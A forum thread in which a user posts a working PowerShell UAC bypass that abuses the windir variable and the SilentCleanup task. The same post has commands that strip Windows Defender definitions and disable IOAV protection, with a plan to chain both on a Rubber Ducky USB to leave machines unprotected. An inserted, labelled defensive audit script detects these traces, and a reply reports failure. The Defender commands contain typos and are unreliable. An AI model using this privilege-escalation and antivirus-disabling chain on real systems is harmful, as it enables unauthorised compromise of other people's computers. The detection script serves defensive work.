ramirez.r1214
Posted May 24, 2019

So I had an idea recently, not sure if it'll work, don't bash me on it, but I was thinking about combining some of Darren's videos and using a bad USB or a Rubber Ducky to not only bypass UAC but turn off Defender. I've been trying this for some time now on my VirtualBox and Windows 10 laptop. In one of his videos he shows Promptless UAC Bypass & Powershell Privilege Escalation.

~~~~~~~~~~~~~~~~~~~~~
if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
    #Payload goes here
    #It'll run as Administrator
} else {
    $registryPath = "HKCU:\Environment"
    $Name = "windir"
    $Value = "powershell -ep bypass -w h $PSCommandPath;#"
    Set-ItemProperty -Path $registryPath -Name $name -Value $Value
    #Depending on the performance of the machine, some sleep time may be required before or after schtasks
    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
    Remove-ItemProperty -Path $registryPath -Name $name
}
~~~~~~~~~~~~~~~~~~~~~~

(What I have learned from running this in Notepad then saving it as uac.ps1: before executing uac.ps1 you need to run "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass" and select yes to avoid the "script is not signed" error.)

Also, the code from Disabling Defender With Viss Episode 1 showed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"c\program files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All
set-MpPreference -DisableIOVProtection $true
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

disabling Defender, but it needs to be run in the admin CMD.

What I am thinking here is somehow coding a Rubber Ducky to first bypass UAC then disable Windows Defender. That way you can begin and have fun with your unlocked unprotected machine. Once again, just an idea, I have no clue if it's possible or makes sense. But I'd really love to try.
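A defender-side audit for the traces the post above describes, as an added example that is not part of the original thread: it looks for a per-user `windir` value in every loaded user hive and reports Defender state that the quoted commands are meant to change. The function names, the signature-age threshold and the lookback window are assumptions, and the Defender cmdlets require the built-in Defender module.

```powershell
# Added example (not from the thread). Function names and thresholds are
# assumptions; run on the host being checked, elevated if possible.

function Get-WindirOverride {
    # %windir% is a machine-wide variable, so a per-user 'windir' value under
    # any <SID>\Environment key is unexpected. Check every loaded user hive.
    foreach ($hive in Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue) {
        $envKey = "Registry::$($hive.Name)\Environment"
        $item = Get-ItemProperty -Path $envKey -Name 'windir' -ErrorAction SilentlyContinue
        if ($null -ne $item) {
            [pscustomobject]@{ Check  = 'Per-user windir override'
                               Detail = "$($hive.PSChildName): $($item.windir)" }
        }
    }
}

function Get-DefenderTamperSign {
    param([int]$MaxSignatureAgeDays = 3, [int]$LookbackDays = 7)
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    if ($pref.DisableIOAVProtection -or -not $status.IoavProtectionEnabled) {
        [pscustomobject]@{ Check  = 'IOAV protection disabled'
                           Detail = "DisableIOAVProtection=$($pref.DisableIOAVProtection)" }
    }
    if ($status.AntivirusSignatureAge -gt $MaxSignatureAgeDays) {
        # Removing definitions leaves an old or missing signature set behind.
        [pscustomobject]@{ Check  = 'Stale or missing signatures'
                           Detail = "Version $($status.AntivirusSignatureVersion), age $($status.AntivirusSignatureAge) days" }
    }
    # Event 5007 records Defender configuration changes, including preference edits.
    $filter = @{ LogName   = 'Microsoft-Windows-Windows Defender/Operational'
                 Id        = 5007
                 StartTime = (Get-Date).AddDays(-$LookbackDays) }
    foreach ($evt in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        $firstLine = ($evt.Message -split "`n")[0]
        [pscustomobject]@{ Check  = 'Defender configuration changed'
                           Detail = "$($evt.TimeCreated): $firstLine" }
    }
}

$findings = @(Get-WindirOverride) + @(Get-DefenderTamperSign)
if ($findings.Count -eq 0) { 'No findings.' } else { $findings | Format-List }
```

Because the posted script deletes the `windir` value right after starting the task, a point-in-time check mostly catches leftovers from interrupted runs; registry value-set auditing on the same key (for example Sysmon event ID 13) covers the short-lived case.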
xaveedra
Posted November 10, 2019

It's a brilliant idea but unfortunately it didn't work, at least for me. I think the problem is that the options weren't written in a proper way, and the path too. It might work after modifying.
Archived
This topic is now archived and is closed to further replies.